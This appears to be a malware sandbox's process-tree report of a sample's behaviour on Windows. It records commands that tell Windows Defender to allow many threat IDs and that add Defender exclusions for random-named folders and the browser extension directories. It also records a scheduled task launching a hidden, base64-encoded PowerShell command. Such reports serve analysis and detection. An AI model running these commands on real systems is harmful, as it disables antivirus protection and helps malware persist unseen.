                                                                                                                                                            powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                                                                                                                                                            2⤵
                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                            PID:860
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                                              3⤵
                                                                                                                                                                PID:3312
                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:3468
                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:5232
                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:5572
                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:2724
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:5236
                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:1684
                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:4552
                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:4424
                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:5248
                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:3840
                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:5044
                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:6100
                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:1156
                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:3688
                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:5416
                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:1672
                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:2744
                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:3596
                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:3292
                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:4980
                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:6096
                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:4492
                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:5648
                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:3364
                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                  PID:5232
                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                    PID:5976
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:2676
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:1684
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ADJLsahCU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ADJLsahCU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DQANlvmTAvZU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DQANlvmTAvZU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PZjcxajBIsNTC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PZjcxajBIsNTC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mWJfrhglotUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mWJfrhglotUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VyWMmqtuSNndeGVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VyWMmqtuSNndeGVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\" /t REG_DWORD /d 0 /reg:64;"
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                      PID:3980
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                          PID:1600
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                              PID:4612
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                              PID:860
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                PID:5508
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                  PID:3468
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                    PID:5620
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                      PID:5976
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                        PID:3688
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                          PID:2800
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                            PID:3552
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                              PID:5376
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VyWMmqtuSNndeGVB /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                PID:2572
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VyWMmqtuSNndeGVB /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                  PID:4612
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                    PID:1600
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                      PID:860
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                        PID:5508
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                          PID:5572
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                            PID:5976
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                              PID:2744
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WPGfhLqOzAIwKSwi /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                PID:5764
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WPGfhLqOzAIwKSwi /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                  PID:5344
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                schtasks /CREATE /TN "gnmHZKShR" /SC once /ST 03:06:27 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                                                                                PID:1788
                                                                                                                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                    PID:2572
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                  schtasks /run /I /tn "gnmHZKShR"
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                    PID:860
                                                                                                                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                        PID:1156
